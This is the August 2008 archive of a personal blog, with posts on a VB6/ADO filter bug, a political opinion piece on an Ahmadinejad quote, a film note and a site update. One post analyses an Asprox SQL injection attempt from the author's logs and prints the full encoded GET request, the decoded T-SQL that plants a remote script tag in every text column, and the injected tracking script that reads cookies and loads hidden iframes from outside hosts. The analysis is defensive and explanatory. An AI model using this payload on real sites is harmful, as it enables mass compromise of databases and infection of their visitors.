You are currently only viewing entries from August 2008.

To go back to view all items, click here. Also, see September 2008 and July 2008
Saturday, 16 August 2008

A Modern(ish) Comedy - VB6 and ADO

Don't use these for anything. Ever. # Permalink C Comment

Yes, OK, I know. VB6 is a dead, bloated monster, as in fact is my edition of the ADO controls. But we have to use them for this project.

And my God, it's funny how terrible it is.

My latest 1-hour-scratching-your-head puzzle is purely an ADO thing. Now, I was designing the interface for filtering a table of appointments, based on Staff Name and/or text in the Appointment Memo or Appointment Type (amongst various other options).

The strategy is building a string for the Filter property of the Recordset. So first I test it with a Staff name. Great! It picks up the not-blank, substitutes it into the SQL filter, and shows the new list.

Now, let's test the Memo/Type filter. Great! It only shows appointments with memos or types containing "Software".

So let's test them both together.

BIG MISTAKE. Runtime Error 3001: Arguments are of the wrong type, are out of acceptable range, or are in conflict with each other.

So I sit there, scratching my head, wrapping things in multiple parantheses to ensure that I'm not accidentally AND-ing together two strings or something. No joy.

So I start searching the internet. 14,000 results. Oh, good. Not just me then.

But there happen to be *thousands* of different ways of generating this error.

Anyway, I eventually track down this ancient, shelved Microsoft Help and Support document. Guess what?

"...Though there is no precedence for AND and OR, the ADO Filter property does not allow you to group OR clauses within parentheses and AND clauses without parentheses...."

That is, the syntax "(cond1 OR cond2) AND cond3" is illegal.

Yep.

Totally illegal.

The article helpfully suggests the following alternatives:

  • "(cond1 AND cond2) OR cond3"
  • "(cond1 OR cond2) OR cond3"
  • "(cond1 AND cond2) AND cond3"

... before pointing out that "... the rules of logic result in very different results ...". No sh*t, Sherlock. We should, in fact, "Be sure that your two filter statements are logically equivalent." What an idea(!)

It finishes by pointing out that "(cond1 OR cond2) AND cond3" is equivalent to "(cond1 AND cond3) OR (cond2 AND cond3)". Thanks. They can expand Boolean brackets!

'ho's a clever boy 'en?

Of course, this isn't that helpful if you don't know how many AND conjunctions you're going to be making. In fact, it's damn near useless without writing a function that expands the brackets at runtime.

Oh wait, it *hasn't* quite finished yet.

Status: This behavior is by design.

Well that's just f***ing perfect.

As to the VB6 side of things, check out this hilarious article by Dr. Dobb, written in 2000. Yes, yet all of the issues remain relevant.

And funny.

V - peace. 

Posted by carl at 04:00

Filed under: Computing

Saturday, 9 August 2008

SQL Injection Attack

Pointless but irritating attacks on me # Permalink C Comment

Some computer network is trying to SQL-inject stuff (include JavaScript files) into this website, using an oldish (April or earlier) exploit, aimed at ASP and T-SQL. Chinese (mainly Beijing, actually, amusingly), American, Canadian, even Belgian server are using a certain GET request to spread what I think is a csrss-style virus.

The GET request is

/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

which translates as an attempt to inject SQL of

DECLARE @S CHAR(4000);
SET @S=CAST(0x4445... AS CHAR(4000));
EXEC(@S);

The long hexadecimal string is

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Which is to say, into every string field everywhere, append an inclusion of the JavaScript script http://sdo.1000mg.cn/csrss/w.js which looks like this:

window.onerror=function(){return true;}
if(typeof(js86eus)=="undefined")
{
var js86eus=1;
var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');
var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe width=100 height=0 src=http://www.plgou.com/csrss/new.htm></iframe>");
}else{
}
}
function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}
 

So there we go.

Edit: ASPROX

I have just discovered the name of this attack: originally, and probably still, this was part of the so-called ASPROX attack. See http://hostmonsterforums.com/showthread.php?t=3949 for background, and http://www.networkcloaking.com/ASPROX_Toolkit.pdf for an excessive analysis of both the attack and various fixes.

Also, http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx has a fix (see its comments too).

The recommended starting point for anyone dealing with this, or merely interested in it, is certainly this July Guardian Technology blog (skip the intro and read the bottom bits). Also, this Microsoft Security Advisory has several useful links under Suggested Actions and then Additional Information.

Rant

Just as a general comment: people, SQL Injection is a stupid standard line of attack which ALL SOFTWARE run on all computers should defend against. All forms, all URL GET requests - if it goes to the server, escape it! We should have stopped this _years_ ago. Yet ASP seems to make it very difficult to fix, and some server-side software packages seem to ship with this blindingly serious error. Which can effectively allow someone complete control of the whole MySQL server, and (if this app isn't chrooted to a chroot jail and otherwise contained) of the whole logical server.

For the love of God people, ESCAPE

Posted by carl at 04:00

Filed under: Computing

Wednesday, 6 August 2008

Ahmadinejad and The Ventriloquist

Oops... I just noticed the West doesn't play fair. # Permalink C Comment

As John Pilger noted in today's Guardian, there is a strange 'we can get away with it' mentality to a lot of Western politics. A great case study for this topic is mentioned in passing in that same article.

You've pretty much certainly heard the 'quote' from Mahmoud Ahmadinejad in which he calls for Israel to be "wiped off the map", in a speech in October 2005 at a conference entitled "The World Without Zionism". The problem is that he didn't say it in English - but now people think he did.

Now don't get me wrong. I dislike this man. But that's hardly a reason to nuke a country with over 65m inhabitants, around 1% of the total world population [CIA World Factbook], so don't go jumping on big red buttons.

(Just a reminder: according to the US Government [Department of State], in 2007 there were estimated to be up to 30,000 Jews, and 300,000 Christians, living in Iran. That's as an antidote to the whole 'nation of [evil] Muslims' thing, in case you're that [sickeningly racist or] stereotypist. As a point of interest and a sideline, the Jews, who do suffer from institutional racism and casual racism - yeah, cause that doesn't happen in the West - are largely determined to stay because it is their homeland. See the documentary Jews of Iran.)

Sure, there are no doubt plenty of religious (but much, much more relevantly political) zealots would love to see an aggressive military campaign against Israel in all senses of the term - but there are plenty of interesting questions like "Was the Dresden bombing ethical, given the German foreign policy of the time?" [Wikipedia article (see references)]

Anyway, the interesting thing about this quote from this speech is that it's still being used today as a rallying point. By people like Gordon Brown [July 2008, BBC News], and David Cameron [January 2007, Telegraph.co.uk].

And doesn't it make a great quote?

The Problem

The thing is, I don't think he said it.

The objections can be summarized in a very simple way:

  • He wasn't talking about the country 'Israel', or the people of 'Israel', but about the regime of 'Israel'.
  • He didn't quite say 'wiped off the map' so much as 'page of history'/'stage of time' (see the linked articles below for elaborations on this theme).

[The following two opinionated Guardian pieces by Jonathan Steele (to be read in this order) detail this stance: If Iran is ready to talk, the US must do so unconditionally and Lost in translation. Look around online for supporting information, don't take just one source.]

The difference? Well, firstly, we're not talking about genocide, but regime change; and secondly, we're not talking about extermination, but putting behind ourselves - forgetting - what Ahmadinejad sees as a despicable regime.

Now clearly, Ahmadinejad does want to be rid of the Israeli regime. (That hardly puts him or Iran in an exclusive political club.) But there's no sense that he considers almost genocidal wars the 'way to go'. (Doesn't seem to bother the Westeners much when our governments talk about war in the Middle East. But that's alright. We're after regime change...)

But we still denounce this politician, condoning the principle of 'pre-emptive' war, ignoring the excesses of Israel - even ignoring the reported comment by then Vice Premier (now President) Shimon Peres that "Iran can also be wiped off the map" [2006, Dominican Today, citing Reuters]. Even ignoring stories like "Revealed: Israel plans nuclear strike on Iran" [Times Online].

And now we have a catchy slogan, one that we're still using 3 years on. (WMDs anyone?)

And we're lovin' it.

Conclusion

I'm doing all my research online. If it's inaccurate, sorry, I do care - tell me. If you disagree, don't say "U igonrent prik u shud b shot u muslim lover". Talk to me. That, after all, is what you're ordering Iran to do :)

Posted by carl at 04:00

Sunday, 3 August 2008

Bergman Season

Ingmar Bergman and his real films # Permalink C Comment

Just a note to say: there's an Ingmar Bergman season on Film4 at the moment.

If you've never seen anything of his, at least in full, you've probably still come across something from The Seventh Seal: the knight playing chess with death.

Brilliant.

Swedish with English subtitles, but brilliant.

Posted by carl at 04:00

Filed under: Culture

Friday, 1 August 2008

Finally, an Update

Hooray! # Permalink C Comment

OK, the site is now fully dynamically run from a database!

Yes, it took a year of not doing it to do it, but I did it.

I'll shortly have some useful/interesting (occasionally both) content in Journal & Articles.

And I'll set it up so that instead of registering, you can leave comments instead with just a CAPTCHA-style thing. Hooray!

And - plus - the comments will be automatically displayed, without waiting for moderation, as you used to. And my old admin system was shite. My new one, by contrast, ain't. It's fully integrated with the main style, in fact.

In the meantime, all old comments have been wiped. I'll restore them from MySQL backups shortly.

Here's to effort!

*chink* 

Posted by carl at 04:00

Journal from August 2008

All entries from month August 2008

Simple diagrams for LaTeX with Inkscape • 1.7.2013 Yesterday I discovered how to make nice, simple, elegant diagrams for fairly painless inclusion… [read more - comment]No Data Connection (Android) • 4.6.2013 Just spent an age dealing with a phone (Samsung Galaxy S2, I9100, on the UK network 3) running a… [read more - comment]Android/BusyBox Segmentation Faults • 30.9.2012 Just had a terrifying moment when, after attempting to install BusyBox on an Android device,… [read more - comment]Temporarily Redefining In-built Mathematica Functions • 16.7.2012 Suppose a package you're using is, say, zealously Simplifying lots of Mathematica expressions… [read more - comment]Nuclear Power • 24.7.2011 I've never known the answers to the big questions about energy. I do know that with … [read more - comment]
top / xhtml / css
© Carl Turner 2008-2017
design & engine by suchideas / hosted by xenSmart